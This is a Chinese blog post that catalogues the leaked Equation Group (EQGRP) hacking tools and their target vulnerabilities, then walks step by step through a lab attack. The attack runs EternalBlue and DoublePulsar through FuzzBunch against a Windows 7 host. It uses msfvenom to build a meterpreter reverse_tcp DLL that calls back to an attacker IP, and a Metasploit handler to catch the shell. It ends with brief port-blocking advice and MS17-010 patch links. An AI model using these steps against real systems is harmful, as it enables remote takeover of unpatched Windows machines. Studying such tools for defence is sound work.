方程式EQGRP_Lost_in_Translation工具利用方法

北京时间4月14号晚,TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group(为NSA提供服务专门对国外进行间谍活动的组织)的黑客工具包。有网友在github上传了相关的解密后的文件,通过简单的分析所有的解密后的文件,发现其中包括新的23个黑客工具。具体请考:https://github.com/misterch0c/shadowbroker/blob/master/file-listing

这些黑客工具被命名为OddJob,EasyBee,EternalRomance,Eternalchampion,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等

  Start.jar //图形界面

  ExplodingCan 是 IIS 6.0 远程漏洞利用工具
  EternalRomance 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
  ErraticGopher 、Eternalblue 、Eternalsynergy 、Eternalchampion 、Educatedscholar、 Emeraldthread 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
  Esteemaudit 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
  Eclipsedwing 是 Windows 服务器的远程漏洞利用工具。
  Eskimoroll 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。
  FuzzBunch 是一个类似 MetaSploit 的漏洞利用平台。
  OddJob 是无法被杀毒软件检测的 Rootkit 利用工具。

模块 漏洞 影响系统 默认端口
ExplodingCan IIS6.0远程利用漏洞 Windows Server 2003 80
EternalRomance SMBv1漏洞(MS17-010)和 NBT漏洞  Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2 139/445
ErraticGopher RPC漏洞 Windows XP SP3, Windows 2003 445
Eternalblue SMBv2漏洞(MS17-010) Windows XP(32),Windows Server 2008 R2(32/64),Windows 7(32/64) 139/445
Eternalsynergy SMB和NBT漏洞 Windows 8, Windows Server 2012 139/445
Eternalchampion SMB和NBT漏洞 Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2, 2012, Windows 8 SP0 139/445
Educatedscholar MS09-050漏洞 Windows vista, 2008 445
Emeraldthread SMB和NBT漏洞 Windows XP, 2003 139/445
Esteemaudit RDP漏洞 Windows XP, Windows Server 2003 3389
Eclipsedwing MS08-067漏洞 Windows 2000, XP, 2003 139/445
Eskimoroll kerberos漏洞 Windows 2000, 2003, 2003 R2, 2008, 2008 R2 88

Doublepulsar

SMB和NBT漏洞 Windows XP(32), Vista, 7, Windows Server 2003, 2008, 2008 R2 139/445
Zippybeer SMTP漏洞   445
Englishmansdentist SMTP漏洞   25
Ewokfrenzy IMAP漏洞 IBM Lotus Domino 6.5.4, 7.0.2 143
Emphasismine IMAP漏洞 IBM Lotus Domino 6.5.4, 6.5.5, 7.0, 8.0, 8.5 143
Easypi IBM Lotus Notes漏洞 Windows NT, 2000 ,XP, 2003 3264
Easybee MDaemon WorldClient电子邮件服务器漏洞 WorldClient 9.5, 9.6, 10.0, 10.1  

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

安装部署

  • 下载 python2.6 并安装,注意,必须安装32位python2.6相关版本,其他版本不奏效。
  • 下载 pywin32 并安装
  • 将 C:\Python26 添加到环境变量 PATH 中。将windows\lib\x86-Windows | x64-Windows  加入到系统环境变量
  • 将 EQGRP_Lost_in_Translation 下载到的文件解压,找到 \ windows\fb.py,将,下图中两个部分注释掉。

然后运行 python fb.py 就可以执行了。

NSA 漏洞利用框架视频过程:

链接: http://pan.baidu.com/s/1hszHQk8 密码: jqi9

可以用msf生成shellcode,payload那里执行run shellcode就可以反弹。成功反弹截图

拿到exp,测了下
所需环境如下:一,攻击机1(32位系统,py2.6版本,pywin32) 二,攻击机2(linux带msf就好)
windows目录下新建listeningposts目录,空的就好(是exp下的windows目录,不是C盘下的windows目录)
不需要注释文件
执行python fb.py
可看到如下页面

利用步骤

在靶机1(192.168.71.133)中安装好python、pywin32以及NSA工具,在

C:\shadowbroker-master\windows 中执行fb.py:

分别设置攻击IP地址192.168.199.107,回调地址192.168.71.133(攻击机1),关闭重定向,设置日志路径,新建或选择一个project:

接下来输入命令:

useETERNALBLUE

依次填入相关参数,超时时间等默认参数可以直接回车:

由于靶机是win7 系统,在目标系统信息处选择1:win72k8r2

模式选1:FB

确认信息,执行

成功后,接着运行use Doublepulsar:

并依次填入参数,注意在function处选择2,rundll

同时在攻击机2 kali的msfvenom 生成攻击dll:

msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

接着执行:

$ msfconsole

msf > useexploit/multi/handler

msf > set LHOST192.168.71.130

msf > set LPORT 5555

msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp

msf > exploit

同时将生成的go.dll上传到攻击机1(192.168.71.133),回到攻击机1,填入攻击dll路径:

接下来一路回车,执行攻击

回到kali,获得shell,攻击成功:

修复方案

1.临时规避措施:关闭135、137、139、445,3389端口开放到外网。推荐使用安全组策略禁止135.137.139.445端口;3389端口限制只允许特定IP访问。

2.及时到微软官网下载补丁升级,微软官方公告连接:

https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

微软已经发出通告 ,强烈建议用户更新最新补丁:

MS17-010 : 严重 - Microsoft Windows SMB 服务器安全更新 (4013389)

https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

MS14-068 :严重 - Kerberos 漏洞可能允许特权提升 (3011780)

https://technet.microsoft.com/library/security/MS14-068

MS10-061:严重 - 打印后台程序服务中的漏洞可能允许远程执行代码

https://technet.microsoft.com/library/security/ms10-061

MS09-050 :严重 - SMBv2 中的漏洞可能允许远程执行代码 (975517)

https://technet.microsoft.com/library/security/ms09-050

MS08-067 :严重 - 服务器服务中的漏洞可能允许远程执行代码 (958644)

https://technet.microsoft.com/library/security/ms08-067

 

 

posted @ 2022-03-22 15:11  Fluorescence  阅读(395)  评论(0编辑  收藏  举报